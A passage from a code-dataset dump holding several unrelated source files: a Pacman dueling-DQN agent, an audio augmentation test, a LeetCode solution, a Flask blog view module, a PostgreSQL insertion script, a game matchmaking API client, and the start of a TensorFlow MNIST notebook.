self.approaching_drop_reward = self.get_approaching_drop_reward(gameState, self.best_action)\n\n self.approaching_enemy_reward = 0\n self.flag_enemy_around = False\n self.flag_enemy_death = False\n for item in self.enemy_data:\n if item:\n pos, dist, timer = item\n self.approaching_enemy_reward += self.get_approaching_enemy_reward(gameState, self.best_action, pos, dist, timer)\n self.flag_enemy_around = True\n self.flag_enemy_death = self.check_enemy_deaf(gameState, self.best_action, pos, timer)\n\n self.prev_best_action = self.best_action\n\n return self.best_action\n\n def getSuccessor(self, gameState, action):\n \"\"\"\n Finds the next successor which is a grid position (location tuple).\n \"\"\"\n successor = gameState.generateSuccessor(self.index, action)\n return successor\n\n def final(self, gameState):\n self.flag_done = True\n\n self.data_set_current.append(self.state_data(gameState))\n all_states = np.asarray(self.data_set_current)\n\n self.my_scaler.fit(all_states)\n all_states = self.my_scaler.transform(all_states)\n\n actions = np.asarray(self.actions_to_indices(self.data_actions))\n\n self.add_reward()\n rewards = self.rewards_values[1:]\n\n done = np.zeros(all_states.shape[0] - 1)\n done[-1] = 1\n\n states = torch.FloatTensor(all_states[:-1, :])\n next_states = torch.FloatTensor(all_states[1:, :])\n actions = torch.FloatTensor(actions[1:]).unsqueeze(1)\n rewards = torch.FloatTensor(rewards).unsqueeze(1)\n done = torch.FloatTensor(done).unsqueeze(1)\n\n states, next_states, actions, rewards, done, history = self.create_tensors_and_history(states, next_states, actions, rewards, done)\n\n target_Q_network = self.Duel_Q_Network()\n self.online_Q_network.train()\n\n # debugging\n #print('SIZE buffer: ', done.size())\n #self.optimizer = torch.optim.Adam(self.online_Q_network.parameters(), lr=1e-4)\n #losses = []\n\n for epoch in range(self.epochs):\n if epoch % self.learning_step == 0:\n target_Q_network.load_state_dict(self.online_Q_network.state_dict())\n with torch.no_grad():\n online_Q_next = self.online_Q_network(next_states)\n target_Q_next = target_Q_network(next_states)\n online_max_action = torch.argmax(online_Q_next, dim=1, keepdim=True)\n y = rewards + (1 - done) * self.gamma * target_Q_next.gather(1, online_max_action.long())\n\n loss = F.mse_loss(self.online_Q_network(states).gather(1, actions.long()), y)\n\n # debugging\n #losses.append(loss.item())\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self.total_epochs += self.epochs\n self.num_games_played += 1\n\n # debugging\n if self.num_games_played % 5 == 0:\n #print('Total Epochs: ', self.total_epochs)\n print('-=TOTAL GAMES=- ', self.num_games_played)\n #print(losses)\n print('Reward Sum: ', np.sum(self.rewards_values[1:]))\n #print(self.rewards_values[1:])\n #print(self.data_actions[1:])\n\n self.save_model(self.online_Q_network, self.optimizer, self.my_scaler, history, self.total_epochs, self.num_games_played)\n\n # load model\n def load_model_helper(self, side):\n file_path = 'model_' + side + '.pth'\n online_Q_network = self.Duel_Q_Network()\n optimizer = torch.optim.Adam(online_Q_network.parameters(), lr=1e-4)\n scaler = StandardScaler()\n history = None\n epochs = 0\n games = 0\n self.flag_new_model = True\n if path.exists(file_path):\n state = torch.load(file_path)\n online_Q_network.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n scaler = state['scaler']\n history = state['history']\n epochs = state['epochs']\n games = state['games']\n 
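`final()` trains with a Double DQN target: the online network chooses the next action, the periodically synced target network evaluates it, and terminal transitions drop the bootstrap term. The core update in isolation, assuming two identically shaped Q-networks and batched `(B, 1)` tensors:

```python
import torch
import torch.nn.functional as F

def double_dqn_loss(online, target, states, actions, rewards,
                    next_states, done, gamma=0.85):
    """Double DQN: select a' with the online net, evaluate with the target net."""
    with torch.no_grad():
        best_a = torch.argmax(online(next_states), dim=1, keepdim=True)
        q_next = target(next_states).gather(1, best_a)
        y = rewards + (1 - done) * gamma * q_next
    q = online(states).gather(1, actions.long())
    return F.mse_loss(q, y)
```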
self.flag_new_model = False\n return online_Q_network, optimizer, scaler, history, epochs, games\n\n # save model\n def save_model_helper(self, side, model, optimizer, scaler, history, epochs, games):\n file_path = 'model_' + side + '.pth'\n my_model = {'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'scaler': scaler,\n 'history': history,\n 'epochs': epochs,\n 'games': games}\n torch.save(my_model, file_path)\n\n # create tensors for learning and data history for the future\n def create_tensors_and_history_old(self, states, next_states, actions, rewards, done):\n if self.my_history is None:\n history = self.create_history(states, next_states, actions, rewards, done)\n return states, next_states, actions, rewards, done, history\n\n r_states = torch.cat((states, self.my_history['states']))\n r_next_states = torch.cat((next_states, self.my_history['next_states']))\n r_actions = torch.cat((actions, self.my_history['actions']))\n r_rewards = torch.cat((rewards, self.my_history['rewards']))\n r_done = torch.cat((done, self.my_history['done']))\n\n k = r_done.size(0)\n perm = torch.randperm(k)\n if k > self.history_size:\n k = self.history_size\n idx = perm[:k]\n history = self.create_history(r_states[idx], r_next_states[idx], r_actions[idx], r_rewards[idx], r_done[idx])\n return r_states, r_next_states, r_actions, r_rewards, r_done, history\n def create_tensors_and_history(self, states, next_states, actions, rewards, done):\n if self.my_history is None:\n history = self.create_history(states, next_states, actions, rewards, done)\n return states, next_states, actions, rewards, done, history\n\n k = self.my_history['done'].size(0)\n perm = torch.randperm(k)\n c = k\n if k > self.train_buffer_size:\n c = self.train_buffer_size\n idx = perm[:c]\n\n r_states = torch.cat((states, self.my_history['states'][idx]))\n r_next_states = torch.cat((next_states, self.my_history['next_states'][idx]))\n r_actions = torch.cat((actions, self.my_history['actions'][idx]))\n r_rewards = torch.cat((rewards, self.my_history['rewards'][idx]))\n r_done = torch.cat((done, self.my_history['done'][idx]))\n\n c = k\n if k > self.history_size:\n c = self.history_size\n idx = perm[:c]\n\n h_states = torch.cat((states, self.my_history['states'][idx]))\n h_next_states = torch.cat((next_states, self.my_history['next_states'][idx]))\n h_actions = torch.cat((actions, self.my_history['actions'][idx]))\n h_rewards = torch.cat((rewards, self.my_history['rewards'][idx]))\n h_done = torch.cat((done, self.my_history['done'][idx]))\n\n #print('SIZE history: ', h_done.size())\n\n history = self.create_history(h_states, h_next_states, h_actions, h_rewards, h_done)\n return r_states, r_next_states, r_actions, r_rewards, r_done, history\n\n # create history helper function\n def create_history(self, states, next_states, actions, rewards, done):\n return {'states': states, 'next_states': next_states, 'actions': actions, 'rewards': rewards, 'done': done}\n\n\nclass Agent_North(Comrades):\n def reward_modifiers(self):\n self.penalty = 0.3 # penalty for each turn\n self.score_multiplier = 0\n self.win_reward = 0\n self.enemy_death_reward = 5\n self.my_death_penalty = 5\n self.stomach_size = 3\n self.food_eaten_reward = 2\n self.drop_food_multiplier = 3\n self.approaching_drop_multiplier = 2\n self.approaching_enemy_multiplier = 2\n self.approaching_food_multiplier = 2\n\n # positions of the target food for the agent North\n def get_my_food_positions(self):\n # North & South\n # n = int(self.current_food_amount / 2)\n # 
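`save_model_helper`/`load_model_helper` bundle the network weights, optimizer state, scaler, replay history, and counters into a single `torch.save` dict. A generic version of that checkpoint pattern (a sketch; the `extra` dict carries whatever auxiliary state the caller wants persisted):

```python
import torch
from os import path

def save_checkpoint(file_path, model, optimizer, extra):
    """Bundle network, optimizer and any extra state into one file."""
    state = {'state_dict': model.state_dict(),
             'optimizer': optimizer.state_dict()}
    state.update(extra)                  # e.g. scaler, history, counters
    torch.save(state, file_path)

def load_checkpoint(file_path, model, optimizer):
    """Restore in place; returns the extra dict (empty for a fresh model)."""
    if not path.exists(file_path):
        return {}
    state = torch.load(file_path)
    model.load_state_dict(state.pop('state_dict'))
    optimizer.load_state_dict(state.pop('optimizer'))
    return state
```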
return self.current_food_positions[n:]\n\n # Offense\n return self.current_food_positions\n\n def load_model(self):\n side = 'North'\n return self.load_model_helper(side)\n\n def save_model(self, model, optimizer, scaler, history, epochs, games):\n side = 'North'\n self.save_model_helper(side, model, optimizer, scaler, history, epochs, games)\n\n\nclass Agent_South(Comrades):\n def reward_modifiers(self):\n self.penalty = 0.3 # penalty for each turn\n self.score_multiplier = 0\n self.win_reward = 0\n self.enemy_death_reward = 5\n self.my_death_penalty = 5\n self.stomach_size = 3\n self.food_eaten_reward = 1\n self.drop_food_multiplier = 1\n self.approaching_drop_multiplier = 2\n self.approaching_enemy_multiplier = 2\n self.approaching_food_multiplier = 2\n\n # positions of the target food for the agent South\n def get_my_food_positions(self):\n # North & South\n # n = int((self.current_food_amount + 1) / 2)\n # return self.current_food_positions[:n]\n\n # Deffense\n return self.enemy_food_positions\n\n # get capsules from our side and distance\n def get_capsules_for_me_dist(self):\n capsules = self.capsules_for_enemy\n if len(capsules) > 0:\n dist = min([self.getMazeDistance(self.my_current_position, cap) for cap in capsules])\n else:\n dist = float('inf')\n return capsules, dist\n\n # defend food on home side\n def get_approaching_food_reward(self, gameState, action):\n reward = 0\n if len(self.my_food_positions) > 0:\n pos = random.choice(self.my_food_positions)\n dist = self.getMazeDistance(pos, self.my_current_position)\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = self.getMazeDistance(pos, my_new_pos)\n if new_distance > dist:\n reward = -1\n elif new_distance < dist:\n reward = 1\n return reward\n\n def load_model(self):\n side = 'South'\n return self.load_model_helper(side)\n\n def save_model(self, model, optimizer, scaler, history, epochs, games):\n side = 'South'\n self.save_model_helper(side, model, optimizer, scaler, history, epochs, games)\n\n\nclass Duel_Q_Network_1000(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_1000, self).__init__()\n\n self.fc1 = nn.Linear(1125, 800)\n self.fc2 = nn.Linear(800, 512)\n\n self.fc_value = nn.Linear(512, 128)\n self.fc_adv = nn.Linear(512, 128)\n\n self.value = nn.Linear(128, 1)\n self.adv = nn.Linear(128, 5)\n\n self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n y = self.a_func(self.fc2(y))\n\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n\n value = self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\nclass Duel_Q_Network_simple(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_simple, self).__init__()\n\n self.fc1 = nn.Linear(37, 43)\n self.fc2 = nn.Linear(43, 29)\n\n self.fc_value = nn.Linear(29, 11)\n self.fc_adv = nn.Linear(29, 13)\n\n self.value = nn.Linear(11, 1)\n self.adv = nn.Linear(13, 5)\n\n self.a_func = nn.Tanh()\n #self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n y = self.a_func(self.fc2(y))\n\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n\n value = 
self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\nclass Duel_Q_Network_very_simple(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_very_simple, self).__init__()\n\n self.fc1 = nn.Linear(37, 23)\n\n self.fc_value = nn.Linear(23, 7)\n self.fc_adv = nn.Linear(23, 11)\n\n self.value = nn.Linear(7, 1)\n self.adv = nn.Linear(11, 5)\n\n self.a_func = nn.Tanh()\n # self.a_func = nn.Sigmoid()\n # self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n value = self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\n\nclass Duel_Q_Network_comp(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_comp, self).__init__()\n\n self.fc1 = nn.Linear(37, 43)\n\n self.fc21 = nn.Linear(43, 13)\n self.fc22 = nn.Linear(43, 13)\n self.fc23 = nn.Linear(43, 13)\n self.fc24 = nn.Linear(43, 13)\n self.fc25 = nn.Linear(43, 13)\n\n self.fc31 = nn.Linear(13, 1)\n self.fc32 = nn.Linear(13, 1)\n self.fc33 = nn.Linear(13, 1)\n self.fc34 = nn.Linear(13, 1)\n self.fc35 = nn.Linear(13, 1)\n\n self.fc41 = nn.Linear(1, 5)\n self.fc42 = nn.Linear(1, 5)\n self.fc43 = nn.Linear(1, 5)\n self.fc44 = nn.Linear(1, 5)\n self.fc45 = nn.Linear(1, 5)\n\n\n #self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n self.a_func = nn.Tanh()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n\n y1 = self.a_func(self.fc21(y))\n y2 = self.a_func(self.fc22(y))\n y3 = self.a_func(self.fc23(y))\n y4 = self.a_func(self.fc24(y))\n y5 = self.a_func(self.fc25(y))\n\n y1 = self.a_func(self.fc31(y1))\n y2 = self.a_func(self.fc32(y2))\n y3 = self.a_func(self.fc33(y3))\n y4 = self.a_func(self.fc34(y4))\n y5 = self.a_func(self.fc35(y5))\n\n y1 = self.fc41(y1)\n y2 = self.fc42(y2)\n y3 = self.fc43(y3)\n y4 = self.fc44(y4)\n y5 = self.fc45(y5)\n\n y = y1 + y2 + y3 + y4 + y5\n\n y_ave = torch.mean(y, dim=1, keepdim=True)\n Q = y - y_ave\n\n return Q","sub_path":"myTeam_RL_dueling.py","file_name":"myTeam_RL_dueling.py","file_ext":"py","file_size_in_byte":34744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357032179","text":"import unittest\n\nimport numpy as np\n\nfrom audiomentations.augmentations.transforms import FrequencyMask\nfrom audiomentations.core.composition import Compose\n\n\nclass TestFrequencyMask(unittest.TestCase):\n def test_apply_frequency_mask(self):\n sample_len = 1024\n samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)\n sample_rate = 16000\n augmenter = Compose(\n [FrequencyMask(min_frequency_band=0.3, max_frequency_band=0.5, p=1.0)]\n )\n\n samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)\n self.assertEqual(samples_out.dtype, np.float32)\n self.assertEqual(len(samples_out), sample_len)\n\n std_in = np.mean(np.abs(samples_in))\n std_out = np.mean(np.abs(samples_out))\n self.assertLess(std_out, 
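All of the `Duel_Q_Network` variants above end with the same aggregation: Q = V + A - mean(A), where subtracting the advantage mean makes the value/advantage split identifiable. The identity in isolation:

```python
import torch

def dueling_aggregate(value, adv):
    """Combine state-value V and advantages A into Q, subtracting the
    advantage mean as in the Duel_Q_Network variants."""
    return value + adv - torch.mean(adv, dim=1, keepdim=True)

v = torch.zeros(2, 1)              # batch of 2, scalar V per state
a = torch.tensor([[1., 2., 3., 4., 5.],
                  [0., 0., 0., 0., 0.]])
print(dueling_aggregate(v, a))     # rows are mean-centred advantages
```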
std_in)\n","sub_path":"tests/test_frequency_mask.py","file_name":"test_frequency_mask.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465583000","text":"class Solution:\n    def lengthOfLongestSubstring(self, s: str) -> int:\n        strTemp = ''\n        for x in range(len(s)):\n            if x == 0:\n                strTemp = s[0:x + 1]\n            else:\n                # print(strTemp)\n                # print(s[x:len(strTemp) + x])\n                if strTemp == s[x:len(strTemp) + x]:\n                    break\n                else:\n                    strTemp = s[0:x + 1] \n        return len(strTemp)\n\nif __name__ == '__main__':\n    s = 'bbbb'\n    print(Solution().lengthOfLongestSubstring(s))","sub_path":"leetcode/3.longest_substring_wo_repeating.1.py","file_name":"3.longest_substring_wo_repeating.1.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547853775","text":"from datetime import date\nfrom flask import (Blueprint, request,\n                   render_template, redirect, url_for, flash, abort)\nfrom forms import PostForm, TagForm\nfrom models import Post, Tag\nfrom database import db\nfrom slugify import slugify\n\nposts_view = Blueprint('posts', __name__, url_prefix='/posts',\n                       template_folder='templates')\ntags_view = Blueprint('tags', __name__, url_prefix='/tags',\n                      template_folder='templates')\n\n\ndef prepare_tags_for_post(tags):\n    if tags is not None:\n        tags_in_db = [tag.tag_name for tag in Tag.query]\n        for new_tag in tags:\n            if new_tag not in tags_in_db:\n                db.session.add(Tag(tag_name=new_tag))\n                db.session.commit()\n        return Tag.query.filter(Tag.tag_name.in_(tags)).all()\n\n\n@posts_view.route('/')\ndef show_posts():\n    def select_tags(id):\n        return ','.join(\n            [tag.tag_name for tag in Post.query.filter(\n                Post.id == id).first().tags])\n    posts = Post.query.order_by(Post.date_created)\n    flash('I am showing you all posts!')\n    return render_template('posts.txt', posts=posts, select_tags=select_tags)\n\n\n@posts_view.route('/visible/')\ndef show_visible():\n    def select_tags(id):\n        return ','.join(\n            [tag.tag_name for tag in Post.query.filter(\n                Post.id == id).first().tags])\n    posts = Post.query.filter(Post.is_visible == 1).order_by(Post.date_created)\n    flash('I am showing you only visible posts!')\n    return render_template('posts.txt', posts=posts,\n                           select_tags=select_tags)\n\n\n@posts_view.route('/create/', methods=['GET', 'POST'])\ndef create_post():\n    if request.method == 'POST':\n        print(request.form)\n        form = PostForm(request.form)\n        if form.validate():\n            slug = slugify('{title} {date}'.format(\n                title=form.title.data, date=date.today()))\n            post = Post(user_id=form.user_id.data,\n                        title=form.title.data,\n                        content=form.content.data,\n                        is_visible=form.is_visible.data,\n                        slugfield=slug,\n                        )\n            tag = form.tags.data\n            post.tags.extend(prepare_tags_for_post(tag))\n            db.session.add(post)\n            db.session.commit()\n            flash('Post created!')\n        else:\n            flash('Form is not valid! 
Post was not created.')\n            flash(str(form.errors))\n    return redirect(url_for('posts.show_posts'))\n\n\n@posts_view.route('/slug/<slug>/')\ndef show_post_by_slug(slug):\n    def select_tags(id):\n        return ','.join(\n            [tag.tag_name for tag in Post.query.filter(\n                Post.id == id).first().tags])\n    post = Post.query.filter(Post.slugfield == slug)\n    print(post.first())\n    if post.first() is not None:\n        flash('I am showing you the post with this slug!')\n        return render_template('posts.txt', posts=post,\n                               select_tags=select_tags)\n    else:\n        abort(404)\n\n\n@tags_view.route('/')\ndef show_tags():\n    tags = Tag.query\n    return render_template('tags.txt', tags=tags)\n\n\n@tags_view.route('/create/', methods=['GET', 'POST'])\ndef create_tag():\n    if request.method == 'POST':\n        print(request.form)\n        form = TagForm(request.form)\n        if form.validate():\n            tag = Tag(tag_name=form.tag_name.data)\n            db.session.add(tag)\n            db.session.commit()\n            flash('Tag created!')\n        else:\n            flash('Form is not valid! Tag was not created.')\n            flash(str(form.errors))\n    return redirect(url_for('tags.show_tags'))\n","sub_path":"flask_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180770753","text":"import os\nimport json\n\nfrom dotenv import load_dotenv\nimport pandas as pd\nimport psycopg2\nfrom psycopg2.extras import execute_values  # needed by the multi-row insert example further down\n\nload_dotenv()\n\nDB_NAME= os.getenv('DB_NAME', default='OOPS')\nDB_USER= os.getenv('DB_USER', default='OOPS')\nDB_PW = os.getenv('DB_PW', default='OOPS')\nDB_HOST= os.getenv('DB_HOST', default='OOPS')\n\n\n# print(DB_NAME)\n# print(DB_USER)\n# print(DB_PW)\n# print(DB_HOST)\n\n# exit()\n\n\n### Connect to ElephantSQL-hosted PostgreSQL\nconnection = psycopg2.connect(dbname=DB_NAME, user=DB_USER, password=DB_PW, host=DB_HOST)\nprint(type(connection))\n\n### A \"cursor\", a structure to iterate over db records to perform queries\ncursor = connection.cursor()\nprint(type(cursor))\n\n### An example query\ncursor.execute('SELECT * from test_table;')\n\n### Note - nothing happened yet! 
We need to actually *fetch* from the cursor\n# results = cursor.fetchall()\n# for row in results:\n#     print(type(row), row)\n\n\n\n### Inserting data ###\n\nmy_dict = { \"a\": 1, \"b\": [\"dog\", \"cat\", 42], \"c\": 'true' }\n\n\n# insertion_query = f\"INSERT INTO test_table (name, data) VALUES (%s, %s)\"\n# cursor.execute(insertion_query,\n#     ('A rowwwww', 'null')\n# )\n# cursor.execute(insertion_query,\n#     ('Another row, with JSONNNNN', json.dumps(my_dict)) # converting dictionary to string\n# )\n\nexit()\n\n# h/t: https://stackoverflow.com/questions/8134602/psycopg2-insert-multiple-rows-with-one-query\ninsertion_query = f\"INSERT INTO test_table (name, data) VALUES %s\"\nexecute_values(cursor, insertion_query, [\n    ('A rowwwww', 'null'),\n    ('Another row, with JSONNNNN', json.dumps(my_dict)),\n    ('Third row', \"3\")\n])\n\ndf = pd.DataFrame([\n    ['A rowwwww', 'null'],\n    ['Another row, with JSONNNNN', json.dumps(my_dict)],\n    ['Third row', \"null\"],\n    [\"Pandas Row\", \"null\"]\n])\n\nrecords = df.to_dict(\"records\") #> [{0: 'A rowwwww', 1: 'null'}, {0: 'Another row, with JSONNNNN', 1: '{\"a\": 1, \"b\": [\"dog\", \"cat\", 42], \"c\": \"true\"}'}, {0: 'Third row', 1: '3'}, {0: 'Pandas Row', 1: 'YOOO!'}]\nlist_of_tuples = [(r[0], r[1]) for r in records]\n\nexecute_values(cursor, insertion_query, list_of_tuples)\n\n#\n# QUERY THE TABLE\n#\n\nprint(\"-------------------\")\nquery = \"SELECT * FROM test_table;\"\nprint(\"SQL:\", query)\ncursor.execute(query)\nfor row in cursor.fetchall():\n    print(row)\n\n# ACTUALLY SAVE THE TRANSACTIONS\nconnection.commit()\n\ncursor.close()\nconnection.close()","sub_path":"module2-sql-for-analysis/inclass/elephant_queries.py","file_name":"elephant_queries.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232289064","text":"import requests\n\nx_auth_token = \"395e027902beeba119a06c67c14f9a97\"\nhost = \"https://huqeyhi95c.execute-api.ap-northeast-2.amazonaws.com/prod\"\n\nplayer_cnt = 30\n\ndef start():\n    res = requests.post(host+\"/start\", headers={\"X-Auth-Token\":x_auth_token}, json={\"problem\":1}).json()\n    return res[\"auth_key\"]\n\ndef getWaitingLine(auth_key): # returns the users currently waiting for a match in the queue, e.g. { \"id\": 1, \"from\": 3 }\n    res = requests.get(host+\"/waiting_line\",headers={\"Authorization\":auth_key}).json()\n    return res\n\ndef getGameResult(auth_key): # returns the results of games that finished this turn, e.g. {\"win\": 10, \"lose\": 2, \"taken\": 7 },\n    res = requests.get(host+\"/game_result\",headers={\"Authorization\":auth_key}).json()\n    return res\n\ndef getUserInfo(auth_key): # returns the current grade of every user, e.g. { \"id\": 1, \"grade\": 2100 },\n    res = requests.get(host+\"/user_info\",headers={\"Authorization\":auth_key}).json()\n    return res\n\ndef putMatch(auth_key,pairs):\n    res = requests.put(host+\"/match\",headers={\"Authorization\":auth_key},json={\"pairs\":pairs}).json()\n    return res\n\ndef putChangeGrade(auth_key,cmds):\n    res = requests.put(host+\"/change_grade\",headers={\"Authorization\":auth_key},json={\"commands\":cmds}).json()\n    return res\n\ndef getScore(auth_key):\n    res = requests.get(host+\"/score\",headers={\"Authorization\":auth_key}).json()\n    return res\n\ndef calcMMR(time): # a 40-minute game moves each player's MMR by 25; a 3-minute game by 50 \n    return (-1.35*time + 104)/2\n\ndef setWaitingTier(lines, mmrs):\n    tmp = {}\n    for line in lines:\n        mmr = mmrs[line[\"id\"]]\n        tmp[(mmr//100)*100] = tmp.get((mmr//100)*100,[]) + [line[\"id\"]]\n    return tmp\n\ndef setMatching(lines, mmrs, players_tiers):\n    pairs = []\n\n    matched = {}\n    for line in lines:\n        if not matched.get(line[\"id\"],False):\n            mmr = (mmrs[line[\"id\"]]//100)*100\n\n            opponent_id = -1\n            \n            for i in range(3):\n                if opponent_id != -1:\n                    break\n                if line[\"from\"] >= 4*i:\n                    can_match_list = set([])\n                    can_match_list.update(players_tiers.get(mmr+100*i,[]))\n                    can_match_list.update(players_tiers.get(mmr-100*i,[]))\n\n                    can_match_list = sorted([(x,abs(mmrs[line[\"id\"]]-mmrs[x])) for x in can_match_list],key=lambda x:x[1])\n\n                    for player_id in can_match_list:\n                        if line[\"id\"] != player_id[0]:\n                            opponent_id = player_id[0]\n                            break \n\n            if opponent_id != -1:\n                pair = [line[\"id\"], opponent_id]\n                pairs.append(pair) \n                players_tiers = removePlayerFromTierList(pair,mmrs,players_tiers)\n                matched[pair[0]] = True\n                matched[pair[1]] = True\n    return pairs\n\ndef removePlayerFromTierList(player_ids, mmrs, players_tiers):\n    \n    for player_id in player_ids:\n        mmr = (mmrs[player_id]//100)*100\n        players_tiers[mmr].remove(player_id)\n    return players_tiers\n\ndef checkGameResult(results, mmrs):\n    for result in results:\n        winner = result[\"win\"]\n        loser = result[\"lose\"]\n        taken = result[\"taken\"]\n\n        mmrs[winner] += calcMMR(taken)\n        mmrs[loser] += -calcMMR(taken)\n    return mmrs\n\ndef sol1():\n    auth_key = start()\n    print(auth_key)\n\n    print(getWaitingLine(auth_key))\n    print(getGameResult(auth_key))\n    print(getUserInfo(auth_key))\n\n    player_mmrs = [1950 for x in range(player_cnt+1)] \n    \n    putMatch(auth_key,[])\n\n    for i in range(594):\n        # check the finished games and update the MMRs\n        game_results = getGameResult(auth_key)[\"game_result\"]\n        player_mmrs = checkGameResult(game_results, player_mmrs)\n\n        # bucket the current waiting line by tier \n        lines = getWaitingLine(auth_key)[\"waiting_line\"]\n        waiting_player_tier = setWaitingTier(lines, player_mmrs)\n\n        pairs = setMatching(lines, player_mmrs, waiting_player_tier)\n        \n        print(putMatch(auth_key,pairs))\n\n    player_with_mmr = []\n    for idx, mmr in enumerate(player_mmrs[1:], start = 1):\n        player_with_mmr.append((idx,mmr))\n\n    player_with_mmr.sort(key=lambda x:x[1])\n    grades_with_player_id = [{\"id\":x[0],\"grade\":idx} for idx,x in enumerate(player_with_mmr)] \n\n    print(putChangeGrade(auth_key, grades_with_player_id))\n    print(putMatch(auth_key,[]))\n    print(getScore(auth_key))\n\n    return 1\n\n\nsol1()","sub_path":"카카오2차 시험/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408010524","text":"import numpy as np\nimport pandas as pd \nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport matplotlib.pyplot as plt\nfrom sklearn.utils 
import shuffle\nimport time\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# First read the train file into the df_train dataframe and run descriptive statistics\ndf_train = pd.read_csv(\"../input/train.csv\")\ndf_train.describe()\n\n# Then read the test file into the df_test dataframe and run descriptive statistics\ndf_test = pd.read_csv(\"../input/test.csv\")\ndf_test.describe()\n\n# Build the training, validation and test sets\n# First shuffle the rows, then split; same effect as train_test_split\n# Shuffle before separating X and Y so samples stay aligned with their labels\ndf_train = shuffle(df_train,random_state = 42) \n# .values converts the dataframe into a plain ndarray without column names\ntrainXYorig = df_train.values\n# Number of rows\nm = trainXYorig.shape[0]\n# Split point: 80% of the rows\npartition = int(m * 0.8)\n# Take everything except the first (label) column and reshape to a 4-D array; the leading -1 lets the sample dimension be any number of images\ntrainXorig = trainXYorig[:, 1:].reshape(-1, 28, 28, 1) # note reshape is a function, so it takes parentheses\n# Normalize\ntrainX = trainXorig / 255 \n# Build train/dev X; define devX first, otherwise rebinding trainX would leave devX with the wrong data\ndevX = trainX[partition: , :, :, :]\ntrainX = trainX[0: partition, :, :, :]\n\n# The first column of the big matrix is the raw label Y\ntrainYorig = trainXYorig[:, 0]\n# NOTE: convert Y from class indices to one-hot vectors (take the label-th row of the 10x10 identity) to make the cross-entropy below easier\ntrainY = np.eye(10)[trainYorig, :] \n# Build train/dev Y with the same split\ndevY = trainY[partition: , :]\ntrainY = trainY[0: partition, :]\n\n# Reshape the test set as well\ntestXorig = df_test.values.reshape(-1, 28, 28, 1)\n# Normalize\ntestX = testXorig / 255\n\n# Print the shape of each dataset as a sanity check\nprint(\"Shape of training set X is {} \".format(trainX.shape))\nprint(\"Shape of training set Y is {} \".format(trainY.shape))\nprint(\"Shape of dev set X is {} \".format(devX.shape))\nprint(\"Shape of dev set Y is {} \".format(devY.shape))\nprint(\"Shape of test set X is {} \".format(testX.shape))\n\n# Plot one image; pick the index-th sample first\nplt.figure()\nindex = 102\n# imshow plots all rows/cols of the first channel of sample index; cmap sets the colormap (not available for 3-channel images); interpolation would set the resampling method (unused here)\nplt.imshow(trainX[index, :, :, 0], cmap ='gray')\n# Give the figure a title\nplt.title(\"No.{} picture,the label is {}\".format(index,trainYorig[index])) # non-ASCII characters in the title may not render correctly?\nplt.show()\n\n# Helper that generates random mini-batches for mini-batch gradient descent\ndef random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):\n    # Total number of input rows\n    m = X.shape[0] \n    # Empty list that will hold all the mini-batches\n    mini_batches = []\n    # Seed the RNG\n    np.random.seed(seed)\n    \n    # permutation is like shuffle, except it returns a new shuffled sequence and leaves the original untouched\n    # given an integer, permutation shuffles np.arange(m), yielding a scrambled list of the values 0..m-1\n    permutation = list(np.random.permutation(m))\n    # Shuffle X and Y with the permuted row indices\n    shuffled_X = X[permutation,:,:,:]\n    shuffled_Y = Y[permutation,:]\n    \n    # Number of complete mini-batches; int() truncates the fractional part\n    num_complete_minibatches = int(m / mini_batch_size) \n    # Slice the shuffled X in a loop to produce the mini-batches\n    for k in range(0, 